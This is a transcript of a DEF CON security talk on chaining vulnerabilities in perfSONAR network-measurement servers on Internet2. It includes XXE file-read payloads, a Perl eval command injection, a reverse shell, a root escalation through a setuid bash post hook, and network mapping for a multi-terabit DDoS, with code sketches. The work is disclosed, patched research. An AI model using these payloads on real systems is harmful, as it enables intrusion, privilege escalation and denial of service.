Welcome. Thank you all for skipping lunch to be here. Welcome to my talk on attacking network infrastructure. My name's Luke. Here's some quick info about me: I'm a security engineer, originally from Minnesota, currently working in the Bay Area. I'm a junior undergraduate student. It's my second year at DEF CON; I spoke last year. I also participate in a lot of bug bounties, so if any of your companies run a bug bounty, you've probably heard my name. It's a great way to smash bugs at hours other than working hours. If you have any questions about this presentation, or you'd like to send me legal threats, there's my contact information. I'll put it back up at the end, and the code and the slides for this presentation will be linked at the end as well. Louder? Okay. Better. I'm trying to avoid tipping it over. Alright, let's get the boring stuff out of the way first. Here's my lovely disclaimer: the views and opinions expressed in this presentation are the author's and don't necessarily reflect the official policy or position of any current, previous, or future employer. Just don't sue me. As usual, we'll start with a quick rundown of what we're going to be talking about today. I'm going to start with what Internet2 is, then move into some of their products, mapping their network, and then exploiting some of those products in order to gain control of devices that are running on very large network uplinks. Now, to make this presentation work, there are two computers and four VMs up here that all have to work together perfectly, and there are only so many sacrifices you can make to the demo gods, so please bear with me if things don't work well. I've tested them enough, but, yeah, without further ado, let's get started. I wanted to give a bit of backstory about how I got started looking at this software and this perfSONAR product, which we'll get into in a minute.
The university I attend has a nice website full of information about what applications and services are available to me as a student. When I'm bored, I like to browse around and see, excuse me, what I'm able to access. It's kind of amazing what an EDU email address grants you these days. One of these pages was called Internet2. The description reads: the Internet is a global system of interconnected networks. The university connects to both the global Internet and a number of special research and education networks commonly referred to as Internet2. These research networks provide high-bandwidth connectivity, enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world. Basically, it's a private fiber network run between universities. It's used for sharing all sorts of research data that would take a very long time to transfer over the standard Internet. If you go to their website, you find an even more boring description about how Internet2 is a community of research and education leaders in academia. Basically, it's a consortium of universities. There are some corporations and some government agencies, but it's mainly universities connected to it, and it's mainly used for sharing research. One of the other things they do is create software for everyone in this consortium. They share the software between all of the companies and universities that participate, and in doing so they also share vulnerabilities with each other, since they're all running the same software. They also do collective bargaining on everything from AWS to Splunk to VMware. Basically, it exists to benefit all of the organizations that participate. The other thing that it is, is a private network. This is what I was talking about: this is a map of their actual dark fiber. The total is about 8.8 terabits a second of optical capacity and about 100 gigabits a second of Ethernet capacity.
Again, it was mainly developed for sharing research and technologies between universities. I get really excited when I see something like this. It's not just a whole bunch of blinking lights; these are additional routing paths between each of the nodes on this network. Internet2 has been around since 1997, and a lot of people didn't really care about security back then, so there's a whole lot of risk here: these routing paths might be trusted, or might not even be considered by some security teams, because they've been around for so long. In addition to the actual network, like I said, they produce a variety of products, and most of these products are open source, which is really nice. The most popular one they have is called Shibboleth. It's a federated identity management system; essentially, it's a really nice, really extensible SAML provider. If you've ever done any penetration testing on pretty much anything running at a US-based university, it likely interacted with Shibboleth for authentication. But Shibboleth is their most popular product and it's been poked at by other people before, so I wanted to look at some of their other stuff. They have a lot of tools in the performance and analytics category: because they run these fiber networks, they need to maintain the health of these networks, and they do that through a tool called bandwidth control (BWCTL), which is essentially a wrapper around iperf. It does a lot of the hard work of setting up a receiver and a sender on either end. NDT is a diagnostics tool, OWAMP is one-way ping, and perfSONAR is a wrapper around all of those tools. It's essentially an ISO you download and install on one of your servers, and it makes scheduling bandwidth control tests and OWAMP tests really easy. We'll look at what it actually looks like in a minute.
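Since BWCTL's whole job, as described above, is getting both endpoints to agree on a test window and a port before handing off to iperf, here's a toy Python sketch of that negotiation idea. This is an illustration of the concept only: the type names, the fixed port, and the hostname are my own inventions, not the real BWCTL protocol.

```python
from dataclasses import dataclass

@dataclass
class Reservation:
    earliest_start: int  # earliest acceptable start, unix seconds
    duration: int        # test length in seconds
    port: int            # port the receiver is willing to open

def negotiate(sender: Reservation, receiver: Reservation):
    """Agree on the later of the two earliest start times and on
    the receiver's offered port, mimicking how a bwctl-style
    control channel schedules both ends before a test runs."""
    start = max(sender.earliest_start, receiver.earliest_start)
    return start, receiver.port

def iperf_command(host, port, duration):
    # The command the sender side would eventually run.
    return ["iperf3", "-c", host, "-p", str(port), "-t", str(duration)]

start, port = negotiate(Reservation(100, 10, 5001), Reservation(130, 10, 5001))
cmd = iperf_command("torpedo.local", port, 10)
```

The point is simply that both ends commit to the same window and port up front, which is the hard part BWCTL automates for you.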
First off, since I just explained what perfSONAR is, let me give a closer example. We're here in Las Vegas, so look at the Las Vegas node: if Las Vegas wanted to make sure that their fiber connection to Salt Lake City is remaining solid, they would set up a perfSONAR instance in Las Vegas and a perfSONAR instance in Salt Lake City, and because they're all part of the same network, they collaborate. Basically, you set up tests to run, say, every 24 hours, and they'll alert you if the network goes down or if performance starts degrading.

Alright, let's look at the two instances we have set up here. These are two perfSONAR instances called Impact and Torpedo, to keep things easy to follow, and you can see they're on the same network. I'm going to run a quick bandwidth control test here, just to show how some of their tooling works. What it's done here is choose to use iperf. You can customize this: you can say I want to use thrulay, or iperf2 or iperf3. The way iperf works, you need both ends to agree on when to set up a receiver and what ports to use, and once that time comes, we get our results. We can see we've got about a gigabit a second, which makes sense, since both of these hosts are running on gigabit connections.

Now let's look at the actual toolkit website. This is what their web interface looks like; it's essentially just a GUI for the tool I just used. You can see here I've set up a test to run every half an hour between Impact and Torpedo, and the last time it ran, the throughput was 600 megabits a second. I can pull up a graph of how that's changed over time. Since this is a virtual machine, there are big gaps here, but it's easy for a network operator to look at this and see what's happening on their network.

Alright, back to the actual presentation. One of the things I like to do when I'm first approaching a product and looking for issues is to look at what mistakes have already been made in the past, because developers tend to make the same mistakes over and over again; it's just how it is right now in the industry. So I went digging. perfSONAR used to be hosted on Google Code, and when I looked it up, the tracker was down because Google Code has been deprecated, but I found issue 783, which is a vulnerability in the web interface that I just showed you. It was patched in 2013, and this is the patch for the issue. If you look at it, it's pulling in Perl's LibXML library and adding an external entity handler that always returns an empty string. So we're going to look at what an external entity is, and then how to exploit them in the real world.

Let's start with a simple XML file; hopefully everyone can see this. We have a list of all the presentations I've given: the name, the location, and then the author, and the author is always going to be the same every time. It's always going to be Luke Young. XML has a feature where you can define an entity, "ly", with the value "Luke Young", and then I can reference this entity with an ampersand, the name of the entity, and a semicolon. That way, if I ever changed my name, say if I got married, I could just edit it here and it would update throughout the rest of the XML document. Most XML parsers support this by default, so when you go to read the value in Python or whatever you're using, it will just return "Luke Young". One of the most popular attacks on this was something called the billion laughs attack. Basically, it's a denial-of-service issue. You start by defining a single entity, then define an entity that includes that one ten times, then another one that includes that entity ten times, and you get exponential growth in memory when an XML parser tries to deserialize the document. For the most part, the example here expands to something like 16 gigabytes of memory and will actually crash most applications
that have XML entities enabled. But denial-of-service bugs in this context are kind of lame; just crashing the software is boring, and it's not what we're looking for. The more interesting feature of XML is something called external entities. You can define a SYSTEM entity with a file URL, and what this will do is actually load the contents of that file and inject it into the XML. In this case, I'm going to load /etc/passwd and fill it in right here. This was originally intended for people who have multiple XML files: you can include other XML files within one another, so you load one in and it magically pulls in all the rest, and you can have a nice folder structure instead of one giant XML file. However, there's obviously a lot of potential for abuse here, because you can include any file from the system.

So, back to the actual issue. The patch for this issue was to make any attempt to load an external entity return an empty string. That does not prevent the denial-of-service issue we just covered, but any time we try to do something like load a file URL, it will fail. The first thing I'm going to do is search for LibXML usage without an external entity handler defined; I've actually rsynced the file system off one of these devices to do that. We're looking to see if they missed anything, or if someone added new endpoints where they forgot to apply this patch. If we run it, right off the bat we've got 13 matches, 13 potential ways to get into this application using external entities. That's actually a bit of a false positive, because some of these are libraries that are symlinked, so Sublime thinks they're different files; there are really only about six distinct ones. The particular one that's vulnerable is in the NMWG message code. As you can see here, it creates a LibXML handler, it doesn't set up a way to block external entities, and then it parses a file, and if we trace this all the way back up the stack, it's reachable by an external user.

That request looks a little bit like this. We're going to send a SOAP request (if any of you have done anything with XML, you probably know what SOAP is), then we'll define this NMWG message, and within it we're going to include /etc/passwd. With this file right here, we're going to try to do this live. We send a POST request to the oppd daemon on the server, which traces all the way back to that Perl file, and if we run it, there's /etc/passwd from one of the systems. Next: authentication in this application is handled by /etc/shadow, so I'm just going to try to read /etc/shadow instead. This is a file I didn't show; it's the exact same request, except for /etc/shadow. And it doesn't work. The server actually sends us an extremely verbose error message saying it can't read that file, and the reason is that the oppd daemon isn't running as root on this device, so we don't have permission to read it. We can read other stuff off the system, for example SQL passwords and configuration files, but none of it was really exploitable. While we can read arbitrary files, because authentication is handled by /etc/shadow, we couldn't get admin users or anything interesting, and the SQL database is blocked off so it's only accessible from localhost. I hit a complete dead end here. Going back to the presentation: I was able to find cross-site scripting pretty much everywhere, but cross-site scripting bugs are kind of lame. You have to get an admin to click a link while they're logged in, and no one logs into these devices that often. So there was a lot of XXE, and as you saw, there were other issues, but getting RCE just seemed like an impossible task.
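Before moving on, the entity mechanics above can be reproduced with Python's standard-library XML parser (the vulnerable software is Perl, so this is purely illustrative, and the NMWG element names in the payload are approximated from memory, not taken from the real schema):

```python
import xml.etree.ElementTree as ET

# 1. Internal entity: &ly; is defined once in the DTD and the
#    parser expands it wherever it is referenced.
doc = """<?xml version="1.0"?>
<!DOCTYPE talks [ <!ENTITY ly "Luke Young"> ]>
<talks><talk><author>&ly;</author></talk></talks>"""
author = ET.fromstring(doc).find("talk/author").text
print(author)  # Luke Young

# 2. Billion laughs: each level references the previous level ten
#    times, so the expanded size grows exponentially. With a 3-byte
#    payload and nine levels of tenfold expansion:
expanded_bytes = len("lol") * 10 ** 9
print(expanded_bytes)  # 3000000000 -- a ~3 GB string from a ~1 KB document

# 3. External entity (XXE): roughly the shape of payload we POST.
#    A SYSTEM entity resolves a URL, here a local file, and inlines
#    its contents into the parsed document.
def build_xxe_payload(target_file="/etc/passwd"):
    return f"""<?xml version="1.0"?>
<!DOCTYPE nmwg:message [ <!ENTITY xxe SYSTEM "file://{target_file}"> ]>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
  <nmwg:metadata id="m1">&xxe;</nmwg:metadata>
</nmwg:message>"""

payload = build_xxe_payload()
```

Note that xml.etree expands internal entities (which is exactly why it's documented as susceptible to billion laughs) but won't resolve external ones; the vulnerable Perl code path, with no entity handler set, resolved the file URL and echoed the file contents back.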
I actually put it down for about a month, and when I finally came back to it later, I found something called bandwidthgraph.cgi; a second ago, that was bandwidthgraph.cgi on screen. This endpoint handles graphing historical bandwidth data from tests, and if we look at the source code for it, we can see something interesting: there's an eval call on an attribute from the XML data that's sent in. We'll trace this all the way back up and get into exploiting it.

First, let's take a look at some example performance data. It's basically iperf results, a timestamp and a throughput value, and if you look at the throughput value, it's a number in scientific notation. Parsing scientific notation in Perl properly is something like five lines, and parsing it with eval is one, so a developer was being lazy and decided to use eval, thinking it was perfectly safe. You can see why they made this mistake: you're in a rush, and this is what happens.

Let's look at how to reach this code path, because it's quite complicated. Starting at the top of bandwidthgraph.cgi, we need a couple of parameters. We need a url parameter, which points at the measurement archive; this measurement archive contains all of the data from tests that have run over time, and we need a URL to access it because you can run this in a cluster environment. We also need a key to look the test up by: if a test has a name, it has a key. Assuming we have both of those, we get all the way down into this get data function, which sets up a data request, makes a request to the measurement archive, and then pulls out this datum XML attribute. Long story short, it gets all the way down to throughput. There's actually a second step in here, too. The way the measurement archive works, when the toolkit makes a request, it first sends an echo request, and we have to echo that back with a success message before it will request the data. The reason that handshake is there is to avoid exactly the kind of attack scenario where you point the toolkit at an attacker-controlled system. However, since this is open source and we have complete access to the source code, we're able to generate the correct echo response. This is what gets sent in, and the important part is the event type: as long as this value contains that string, it will be accepted by the server. Following that, we send back our actual exploit string. If you look at the throughput parameter here, we've put backtick-whoami-backtick, because this is being evaled by Perl, and in Perl, backticks drop to a shell. That's our example exploit.

Now, I actually have a script to do all of this, and all of these scripts are available right now if you have the link. We have a simple server here that handles all of the magic of responding to the echo request and then sending the exploit string. If we pull up bandwidthgraph.cgi, you can see we've provided the key parameter; in this case, it doesn't matter what it is, because we control the server. We point it at our server, and we don't see anything interesting on the page, but if we view the source, right there in the source it has printed out the result of whoami. Taking that a step further, we can use a full payload, just a Python pty callback, so we can get an actual shell on this device instead of having to run commands one at a time. We refresh the page, and we have a full shell.

You can see we're running as apache. So, same thing as before: we try to cat /etc/shadow, and it doesn't work again. We're kind of stuck having regular RCE fun, but we want root RCE, so that's what we're going to talk about now: how we obtained root on this device. If we pull up the perfSONAR toolkit interface, it has the ability to change configuration settings: you can turn services such as bandwidth control on and off.
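To recap the eval bug from a moment ago in runnable form: it's a Perl bug, but the same trap is easy to demonstrate in Python, where eval parses scientific notation in one expression and just as happily runs anything else. The datum element at the end is a reconstruction from memory of roughly what the exploit response carried, not the exact schema.

```python
# Safe: parse scientific notation with float(). One line, no eval.
def parse_throughput(value: str) -> float:
    return float(value)

print(parse_throughput("5.1e8"))  # 510000000.0

# Unsafe: eval() also parses "5.1e8", which is why it tempts lazy
# parsing code, but it will execute arbitrary expressions too.
captured = []
attacker_value = "captured.append('code ran') or 0.0"
eval(attacker_value)
print(captured)  # ['code ran']

# In the Perl original, backticks inside the evaled string drop to
# a shell. A datum carrying that payload would look something like:
datum = '<nmwg:datum timeValue="1500000000" throughput="`whoami`"/>'
```

Same lesson in both languages: eval is a parser of last resort, and anything attacker-influenced that reaches it is code execution.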
You can also change configurations for those services: you can change the default port, or change what restrictions there are. For example, you can set bandwidth control to only accept TCP or only accept UDP performance tests. Now, to start and stop services on Linux, you need root, unless you've made special changes, so somehow the application is obtaining root to do this. But if we go back to our shell, we don't have sudo privileges, and there's no easy path to root through file permissions or anything else.

If we look at the source code again, all the way down, they have a daemon running as root called toolkit config. It's a simple XML-RPC server, it's only listening on loopback, and it exposes five methods. It exposes a configure-firewall method with no parameters, so nothing exploitable there, and it exposes write-file plus start-, stop-, and restart-service methods. Write-file looks really interesting: ideally we'd just write a new file, a new cron job, as root, and we'd have our escalation. Here's the example code to do that: we load in the config client, point it at the loopback interface, and call the save file method, which is an alias of write file (I don't know why they change the method name in different parts of the application). If we try to actually run this, it doesn't work; we have another issue. Looking at the source code, there's actually a whitelist of which files you're allowed to edit. They put a little thought into this and decided they shouldn't let someone write arbitrary files as root, because that's a bad idea, so they built this whitelist. Here are all of the files in it. It's a rather extensive list, because this is an extremely customizable application (you can install other packages), so basically every config file that would ever need to be edited as part of this application is in the list. And there are a couple of interesting ones in here. There's /etc/hosts, so we have the ability to redirect network traffic. There's the NTP config, so if we have any issues, we can change the time on the host. And there's a bunch of perfSONAR software configs, bandwidth control, OWAMP, NDT, and we can edit all of those. We can also write HTML files, since we're apache, so we could drop a cross-site scripting payload, but again, not very interesting; we want root on this device.

So look at the bandwidth control configuration; this is an excerpt from it. It's got a user and a group, so it drops privileges immediately after starting, and then a post hook parameter at the bottom. This is similar to a git hook: after a successful bandwidth control test, it executes the post hook. Since we can edit this config, we can change the user and group so that the application never drops privileges and keeps running as root, and then point the post hook at a script controlled by our apache user. That way, when we trigger a successful test, our post hook runs as root.

Actually doing that is a little more complicated, because we don't want the network administrator to notice that something's broken, so we have to do this, and restore the original configuration, as quickly as possible. So: back up the original config, stop bandwidth control, write our post hook, write the new bandwidth control config, start bandwidth control, trigger a session (which has to be successful) to fire our post hook, stop bandwidth control, remove our post hook so we delete our evidence, restore the original bandwidth control config, and start it back up again.

I'm going to try to do that now. We have our shell, we're currently logged in as apache, and I'm going to pull down shell.pm, which is a script I've written, and run it. That's going to take about 60 seconds, so let's look at what it's doing. It pulls in the config client again.
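Here's a sketch of the two artifacts the escalation needs: the replacement bandwidth control config that keeps root and registers our hook, and the hook script itself. The user/group/post hook keys come from the config excerpt above; the file paths and exact config syntax are invented for illustration.

```python
def exploit_bwctld_conf(hook_path: str) -> str:
    # Config fragment: stay root instead of dropping privileges,
    # and fire our hook after every successful test.
    return (
        "user root\n"
        "group root\n"
        f"post_hook {hook_path}\n"
    )

def post_hook_script(shell_copy: str = "/tmp/.rootsh") -> str:
    # The hook runs as root: copy bash somewhere we control and set
    # the setuid bit, so the apache user can later run it (with -p)
    # to get a root shell.
    return (
        "#!/bin/bash\n"
        f"cp /bin/bash {shell_copy}\n"
        f"chmod u+s {shell_copy}\n"
    )

conf = exploit_bwctld_conf("/tmp/.hook.sh")
hook = post_hook_script()
```

The real shell.pm then wraps these in the backup/swap/trigger/restore sequence described above so the window where the modified config is live is as short as possible.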
There's a line here that I don't know why it has to be there (I don't write Perl scripts), but it crashes without it. And here is the post hook we're actually writing: we copy /bin/bash to a different path and then set the setuid bit on that binary, so that whenever we run it, we become root. The rest of the script does all of the work of swapping in our exploit config, with the post hook parameter inside it, and restoring the original config afterward. So if we go back to the shell... hopefully... this is why you don't do live demos... let's try that again... oh, we are root. Okay, it did work. Awesome.

Now, that's fun, we have root on these devices, but who cares? Is anyone actually even running these things? I happened to stumble across this, and it's an obscure application. Are these running anywhere in the wild? That was my next question, so the next goal was to find out where these are running. I don't have an ISP that plays nice with mass-scanning the entire IPv4 internet space, so I had to find a nicer way to locate these devices. If you look at an example, here's a live instance of one of these running, and there's all sorts of information here. This is unauthenticated: you can view all of this without any creds. You can see what services are running and what ports they're running on, and more importantly, you can see the interfaces on the right there. You can see whether they're connected, whether they're dual-homed and connected to an internal private network, you can see the MAC addresses of the devices, and you can even see the speed of the card according to ethtool, so we can tell if there's a 10-gigabit device without even authenticating. The other thing we have, at the bottom, is test results, so you can see what other hosts each of these instances is testing against. The idea is that we start with one of these nodes, we ask it who it's testing against, then we ask each of those nodes who they're testing against, and we map
the entire network that way. But we still need some starting nodes, so if only there was a public database of all of these devices... oh wait. If you look in the corner up here, there's "globally registered", which is pretty much exactly what you think it is: they provide an actual database on their site of all of the globally registered perfSONAR servers, also unauthenticated. It even has a pretty web interface. So here's the idea: we start with the public list, and because there are still unlisted instances, we map the network from there. The greyed-out ones represent instances that aren't publicly registered but that we can locate through the others.

To do that, I wrote an approximately 300-line Golang script that does exactly what I've just described: it pulls down the list of all the publicly registered instances, maps who they're all testing with, maps those in turn, and pulls down the interface data from each of them. It takes about 4 minutes to map the entire network from my gigabit connection. That could probably be improved; it's not actually saturating the link, and my code kind of sucks, but it's open source, so someone else can fix it.

What I then do is take all of this data and load it into Splunk. As of April 29th, when I mapped the network, there were 970 publicly routable nodes, with a combined 12.51 terabytes of RAM and 29.85 terahertz of CPU cycles across all of these devices. In easier-to-understand terms, the average node has 13 gigabytes of RAM and 12 cores at 2.6 gigahertz. Next, we want to look at the theoretical network speed of these devices. Included in that data is information about the network card in each box, so I can tell if it's a 10-gig or a 20-gig or a 40-gig card, and if we sum all of those together, we get the theoretical bandwidth of the perfSONAR network, which is 5.719 terabits per second.
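Backing up to the crawl itself for a moment: seeding from the public registry and then walking each node's test peers is a plain breadth-first search. My real version is the ~300-line Go script mentioned above; here's a toy Python sketch with the network fetch stubbed out, so the hostnames and peer lists are invented.

```python
from collections import deque

# Stub for demonstration: maps each node to the peers it tests
# against. A real crawler would hit each node's unauthenticated
# test-results page instead of this dictionary.
PEERS = {
    "lv.example.edu":     ["slc.example.edu"],
    "slc.example.edu":    ["lv.example.edu", "hidden.example.edu"],
    "hidden.example.edu": ["slc.example.edu"],
}

def crawl(registered):
    """BFS outward from the publicly registered seed nodes,
    discovering unregistered instances via their test peers."""
    seen, queue = set(registered), deque(registered)
    while queue:
        node = queue.popleft()
        for peer in PEERS.get(node, []):
            if peer not in seen:  # unregistered nodes surface here
                seen.add(peer)
                queue.append(peer)
    return seen

nodes = crawl(["lv.example.edu"])
print(sorted(nodes))
```

In this toy graph, `hidden.example.edu` never appears in the registry, but one hop of peer-walking finds it, which is exactly how the greyed-out nodes on the slide were located.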
Now, I really wanted to know what this network was actually capable of, because you may have a 10-gig card and only a 5-gig uplink, and I couldn't find any way to tell that without exploiting the server, and I'd like to not go to jail. However, I had an idea. I have a gigabit connection at home, so I can run bandwidth tests from my server to one of the perfSONAR instances and learn something about their bandwidth. But that has an upper bound: I can only measure up to a gigabit a second, since I only have a gigabit uplink, and I'm not about to go pay for a 40-gig uplink to test these vulnerabilities. So I had to find some other way. It turns out they have another friendly unauthenticated API where you can say: run a bandwidth test against this other perfSONAR node and send me the results. The goal, then, is to enumerate all of the perfSONAR instances and their maximum interface speeds, calculate their locations based on GeoIP, find the 5 closest instances to each that have the same or faster network cards, and then, after all of that is done, run tests between them. This sounds like some horrible messed-up CS interview question, and I can guarantee you I did not implement it very efficiently. There's the Splunk query that does all of that; it works, it takes about an hour to run, but it does return results. Once we have all of that data, we actually run the tests, and we have to be careful here, because we genuinely risk generating a denial of service while running them. So we never run more than 10 tests at the same time, ever, and we never run two tests against the same instance at once: if you have a 10-gig uplink and I run two 10-gig tests against you, they're each going to get about 5 gigs, which is inaccurate, so I only ever run one at a time per host. And some hosts don't have bandwidth control enabled, so while I know they're exploitable, I can't find out what their bandwidth is.
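The peer-selection and scheduling constraints above can be sketched as follows. The coordinates are a stand-in for the GeoIP math, and the batching just enforces the two rules: at most 10 tests in flight, and no node in two tests at once. All node names and numbers here are invented.

```python
# node -> (x, y, nic_gbps); toy coordinates stand in for GeoIP.
NODES = {
    "a": (0, 0, 10), "b": (1, 0, 10), "c": (0, 1, 40),
    "d": (5, 5, 10), "e": (6, 5, 40),
}

def dist(n1, n2):
    x1, y1, _ = NODES[n1]; x2, y2, _ = NODES[n2]
    return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5

def candidate_pairs(k=5):
    # For each node, pick the k nearest peers whose NIC is the same
    # speed or faster, so the peer is never the bottleneck.
    pairs = set()
    for n, (_, _, nic) in NODES.items():
        peers = [m for m in NODES if m != n and NODES[m][2] >= nic]
        for m in sorted(peers, key=lambda m: dist(n, m))[:k]:
            pairs.add(tuple(sorted((n, m))))
    return pairs

def schedule(pairs, max_parallel=10):
    # Greedy rounds: a pair joins the current round only if neither
    # endpoint is already testing in that round, and a round never
    # exceeds max_parallel concurrent tests.
    rounds, remaining = [], sorted(pairs)
    while remaining:
        busy, this_round, leftover = set(), [], []
        for a, b in remaining:
            if a not in busy and b not in busy and len(this_round) < max_parallel:
                this_round.append((a, b)); busy |= {a, b}
            else:
                leftover.append((a, b))
        rounds.append(this_round); remaining = leftover
    return rounds

rounds = schedule(candidate_pairs())
```

The real version did this as a Splunk query rather than Python, which is part of why it takes an hour, but the constraints are the same.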
Those are hosts that, if we were exploiting this for real, we would have been able to attack, but that we can't measure, because they don't have bandwidth control enabled. Doing all of that, which takes a very long time to run, I was able to calculate the actual demonstrated total bandwidth of the perfSONAR network, which is 3.7 terabits per second. Now, in the title of the talk, I mentioned 4 terabits, and I didn't just round up: I also accounted for all of those instances that don't have bandwidth control enabled but that we know are sitting on at least a 100-megabit uplink, and if you combine all of that together, you get to 4 terabits per second.

To put that in context: two years ago now, Cloudflare blocked an attack in Europe against Spamhaus. It was a 300-gigabit-per-second attack, and they saw an interesting effect where parts of their network could handle the traffic, but their upstream ISP peers were actually falling over. That's one of the risks when you have that much bandwidth, and that was 300 gigabits a second, two years ago. This is 4 terabits a second, and we have complete control of the packets being sent, because we are root on these devices. This isn't something like DNS amplification, where with the right firewall rule, you can block the traffic. I could send you 4 terabits a second of legitimate HTTP requests, assuming the network cards can push that out, and it's really hard to filter something like that, because it could be legitimate traffic.

Alright, on to the live demo, where hopefully we are going to take down a site, and not someone else's site, again. For the initial version of this talk, I had a couple of perfSONAR instances running at home, and I was planning on attacking a server co-located in a data center. I launched the attack, and my phone blew up, because I crashed the network
at the house, and there were about 18 dudes pissed off at me that their internet didn't work. About 10 minutes later, I got a letter from the ISP saying, please stop doing that. So we're going to cheat a little and attack some VMs here instead. We have a simple HTTP server running on poncho here, I'm going to download a simple DDoS script, and, hopefully you can see it, it's really hard to see, but the site is just sitting there spinning right now.

On to the last part. I reported all of these issues to perfSONAR, so, sorry to disappoint you, you can't actually go exploit these right now. I would highly encourage people to continue looking at this software, though. It's a legacy Perl application, I don't think I found everything by any means, and I kind of stopped once I had a full chain all the way to root. It is interesting, and they are very responsive. This was one of the pull requests: since it's all open source, I just fixed the issues myself, and the team was extremely friendly. They fixed the issues, merged my request within 24 hours, and pushed out a new build pretty much immediately. The great part is that all of these instances have auto-updates enabled, so pretty much everyone on the network is upgraded at this point; that build was pushed out about a month ago. So when you do find security issues, they typically get patched very quickly, and I was very happy with their response time.

Finishing up: all of the exploit code has been released on my GitHub, along with the slides. bored.engineer has links to it, right there, if you don't want to remember that. As promised, here's my contact info again. We got out a little early this time, so you have some time to make it to your next talk. If people have questions, feel free.

That was a really good question: he asked what I spent $5 on. I should repeat the question. The question was, what did you spend $5 on? Good question; it's in the talk title. In the initial version of this talk, I was going to spin up a VPS instance for $5 and then launch the attack live across the internet, and then of course my ISP got very angry about that, so I didn't, and unfortunately I didn't update the title. That's what the $5 was for. Total time spent actually finding the exploits was probably about 10 hours, writing reliable exploits for them was probably another 6, and then mapping the network was a colossal pain, since I'm not a stats person, and figuring out how to write those queries correctly sucks; that was probably another 10 to 40 hours, roughly. Thank you all, have a great DEF CON, see you next year. Thanks.